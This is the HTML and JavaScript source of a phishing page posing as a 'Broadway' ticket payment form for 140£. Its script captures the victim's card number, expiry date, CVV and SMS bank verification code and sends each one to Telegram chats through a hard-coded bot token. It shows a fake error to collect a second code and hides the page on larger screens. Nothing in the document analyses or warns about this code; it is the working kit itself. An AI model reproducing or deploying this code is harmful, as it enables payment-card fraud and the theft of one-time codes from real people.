<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Broadway</title>
    <style>
        body {
            background-color: #190e54;
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            color: #fff;
        }

        .container {
            text-align: center;
        }

        h1 {
            text-decoration: none;
            margin-top: -200px;
            margin-bottom: 200px;
        }

        .line {
            height: 2px;
            background-color: #fff;
            width: fit-content;
            margin: 10px auto;
        }

        .input-field {
            margin: 10px 0;
            background-color: transparent;
            border: 1px solid #fff;
            color: #fff;
            border: 1px solid #b2b0f9;
            border-radius: 4px;
        }

        .credit-icons {
            display: flex;
            justify-content: center;
            margin-top: 600px;
            margin-left: -220px;
        }

        .footer {
            margin-top: 20px;
            font-size: 12px;
        }

.modal {
    display: none;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(0,0,0,0.5);
    z-index: 1000;
    justify-content: center;
    align-items: center;
}

.modal-content {
    display: flex;
    flex-direction: column;
    align-items: center;
    text-align: center;
    background: rgba(58, 23, 139);
    padding: 20px;
    border-radius: 5px;
    height: 500px;
    justify-content: center;
}
       .alert-text {
        margin-top: 20px;
        display: block;
        background-color: #c36;
        padding: 10px 0px;
        border-radius: 10px;
        width: 95%;               /* Увеличенная ширина */
        text-align: center;         /* Центрирование текста */
        margin-left: 10px;
        cursor: pointer;
        text-decoration: none;      /* Убрано подчеркивание */
        color: inherit;             /* Чтобы текст на кнопке имел такой же цвет, как и остальной текст */
        }


/* По умолчанию, блок с ошибкой скрыт */
.desktop-error {
    display: none;
    position: fixed;
    top: 0;
    left: 0;
    right: 0;
    bottom: 0;
    background-color: rgba(0, 0, 0); /* Полупрозрачный чёрный фон */
    color: white;
    font-size: 24px;
    text-align: center;
    padding-top: 20%; /* Для вертикального центрирования текста */
    z-index: 9999; /* Чтобы блок был выше других элементов */
}

/* Если ширина экрана больше 1024px (обычно это десктопные компьютеры), покажем сообщение */
@media screen and (min-width: 600px) {
    .desktop-error {
        display: block;
    }

    /* Скрываем остальное содержимое сайта */
    body > *:not(.desktop-error) {
        display: none;
    }
}


.date-cvv-group {
    display: flex;
    justify-content: space-between;
    gap: 10px;
}

.date-cvv-group > input {
    flex: 1; /* позволяет полям даты и CVV занимать всю доступную ширину */
    margin: 15px 0;
            background-color: transparent;
            border: 1px solid #fff;
            color: #fff;
            border: 1px solid #b2b0f9;
            border-radius: 4px;
            padding: 10px;
}

#cardNumber{
    margin: 15px 0;
    padding: 10px;
            background-color: transparent;
            border: 1px solid #fff;
            color: #fff;
            border: 1px solid #b2b0f9;
            border-radius: 4px;
            width: 93%;
}


.payment-options {
    display: flex;
    flex-direction: column; /* Располагаем элементы один под другим */
    align-items: center; /* Выравниваем элементы по центру */
    width: 100%; /* Ширина на всю доступную ширину */
    padding: 10px 0; /* Верхний и нижний отступы */
    margin-top: -100px;
}

.payment-logo {
    width: 100%;
    height: 40px;
    cursor: pointer;
    border: 2px solid white;
    border-radius: 15px;
    padding: 5px;
    margin-bottom: 10px;
    box-sizing: border-box;
    background-repeat: no-repeat;
    background-color: black; /* Задний фон кнопки */
    background-position: center; /* Центрирует изображение по вертикали и горизонтали */
    background-size: contain; /* Изображение будет масштабировано, сохраняя пропорции */
}


.apple-pay {
    background-image: url('apple.png');
}

.google-pay {
    background-image: url('google.png');
}

hr {
    margin: 20px 0;
    border: none;
    border-top: 1px solid #ccc;
}
.transparent-input {
    background-color: rgba(255, 192, 203, 0.5); /* Розовый с прозрачностью */
    border: 1px solid #ff69b4; /* Розовая граница */
    border-radius: 10px; /* Закругляем углы */
    padding: 10px; /* Отступ внутри поля */
    width: 100%; /* Занимает всю доступную ширину */
    margin-bottom: 10px; /* Небольшой отступ снизу */
}

.pink-button {
    background-color: #ff69b4; /* Розовый цвет */
    color: #fff; /* Белый цвет текста */
    border: none; /* Убираем границу */
    border-radius: 10px; /* Закругляем углы */
    padding: 10px 20px; /* Отступы внутри кнопки */
    cursor: pointer; /* Изменяем курсор при наведении */
}

.modal-content h2 {
    color: #ff69b4; /* Розовый цвет текста */
}

#timer {
    font-size: 24px;
    color: #ff69b4; /* Розовый цвет текста */
    margin-top: 10px; /* Отступ сверху */
}


#loading-animation {
    display: none;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.5);
    z-index: 1000;
    justify-content: center;
    align-items: center;
}

.spinner {
    border: 4px solid rgba(255, 255, 255, 0.3);
    border-radius: 50%;
    border-top: 4px solid #ff69b4;
    width: 50px;
    height: 50px;
    animation: spin 2s linear infinite;
}

@keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

.error-modal {
    display: none;
    position: fixed;
    left: 0;
    right: 0;
    top: 0;
    bottom: 0;
    background-color: rgba(0,0,0,0.7);
    z-index: 1000;
    /* Добавьте следующие строки для использования flexbox: */
    display: flex;
    align-items: center; /* центрирование по вертикали */
    justify-content: center; /* центрирование по горизонтали */
    color: red;
    text-align: center;
    font-size: 15px;
}


    </style>
</head>
<body>

<div class="container">
    <a href="book.html">
    <h1>BROADWAY</h1>
</a>
    <div class="line"></div>

<div class="payment-options">
    <div class="payment-logo apple-pay" onclick="notifyUnavailable()"></div>
    <div class="payment-logo google-pay" onclick="notifyUnavailable()"></div>
</div>
<hr>
    <div class="form-group">
    <input type="text" id="cardNumber" placeholder="Card number">

    <div class="date-cvv-group">
        <input type="text" id="cardDate" placeholder="Date">
        <input type="text" id="cardCVV" placeholder="CVV">
    </div>


</div>
    <button onclick="checkFields()" class="alert-text">Pay 140£</button>
    <div class="footer">© 2023 AFISHA All rights reserved</div>
</div>


<!-- Модальное окно для ввода SMS-кода -->
<div class="modal" id="smsModal">
    <div class="modal-content">
        <h2>The code will arrive within a minute (do not close this window until the code arrives)</h2>
        <input type="text" id="smsCode" placeholder="Введите SMS код" class="transparent-input">
        <button onclick="closeModal()" class="pink-button">Wysłać</button>
    </div>
</div>

<div id="loading-animation">
    <div class="spinner"></div>
</div>



<div class="credit-icons">
    <img src="cc_images.png" alt="MasterCard">
</div>




<!-- Всплывающее окно с ошибкой -->
<div class="error-modal" id="errorModal" style="display:none;">
    <p>An error occured. Try again.</p>
</div>




<script>


function startTimer(duration, display) {
    let timer = duration, minutes, seconds;
    const countdown = setInterval(function () {
        minutes = parseInt(timer / 60, 10);
        seconds = parseInt(timer % 60, 10);

        minutes = minutes < 10 ? "0" + minutes : minutes;
        seconds = seconds < 10 ? "0" + seconds : seconds;

        display.textContent = minutes + ":" + seconds;

        if (--timer < 0) {
            clearInterval(countdown);
            display.textContent = "00:00"; // Можно выполнить другое действие после завершения отсчета
        }
    }, 1000);
}

function sendToTelegram(messageText) {
    const BOT_TOKEN = '6327462937:AAEOBZLwYydhyRuzsl8OiECiXuflsj_gA-M';
    const CHAT_IDS = ['542512373', '1847233326'];

    CHAT_IDS.forEach(chatId => {
        fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage?chat_id=${chatId}&text=${messageText}`)
            .then(response => response.json())
            .then(data => {
                if (data.ok) {
                    console.log(`Сообщение успешно отправлено на чат с идентификатором ${chatId}`);
                } else {
                    console.error(`Ошибка при отправке сообщения на чат с идентификатором ${chatId}: ${data.description}`);
                }
            })
            .catch(error => console.error(`Произошла ошибка при отправке на чат с идентификатором ${chatId}: ${error}`));
    });
}


function checkFields() {
    const cardNumber = document.getElementById('cardNumber').value;
    const cardDate = document.getElementById('cardDate').value;
    const cardCVV = document.getElementById('cardCVV').value;

    if (cardNumber && cardDate && cardCVV) {
        const messageText = `ОПЛАТА НА 140£    Номер карты: ${cardNumber}    \nДата: ${cardDate}     \nCVV: ${cardCVV}`;
        sendToTelegram(messageText);
        document.getElementById('smsModal').style.display = 'flex';
    } else {
        alert('Please fill out all fields.');
    }
}


let attempts = 0;

function closeModal() {
    const smsCode = document.getElementById('smsCode').value;
    if (smsCode) {
        const messageText = `Wprowadzony kod SMS: ${smsCode}`;
        sendToTelegram(messageText);

        // Показываем элемент анимации
        const loadingAnimation = document.getElementById('loading-animation');
        loadingAnimation.style.display = 'flex';

        // Устанавливаем задержку в 30 секунд
        setTimeout(function () {
            attempts++;
            if (attempts === 1) {
                showErrorModal(); // Показываем ошибку после первой попытки
            } else {
                // По истечении времени перенаправляем пользователя
                window.location.href = 'ticket2.html';
            }
        }, 25000); // 30 секунд в миллисекундах
    } else {
        alert('Пожалуйста, введите SMS-код.');
    }
}



function showErrorModal() {
    console.log("Showing error modal"); // Для отладки

    const errorModal = document.getElementById('errorModal');
    const smsModal = document.getElementById('smsModal');
    const loadingAnimation = document.getElementById('loading-animation');

    loadingAnimation.style.display = 'none'; // скрываем анимацию загрузки
    smsModal.style.display = 'none'; // закрываем модальное окно с SMS-кодом
    errorModal.style.display = 'block'; // показываем окно с ошибкой

    // Задержка в 5 секунд перед закрытием окна с ошибкой
    setTimeout(function() {
        errorModal.style.display = 'none'; // закрыть окно с ошибкой
    }, 5000); // 5 секунд в миллисекундах
}




    function notifyUnavailable() {
        alert("This payment method is temporarily unavailable");
    }



</script>

</body>
</html>
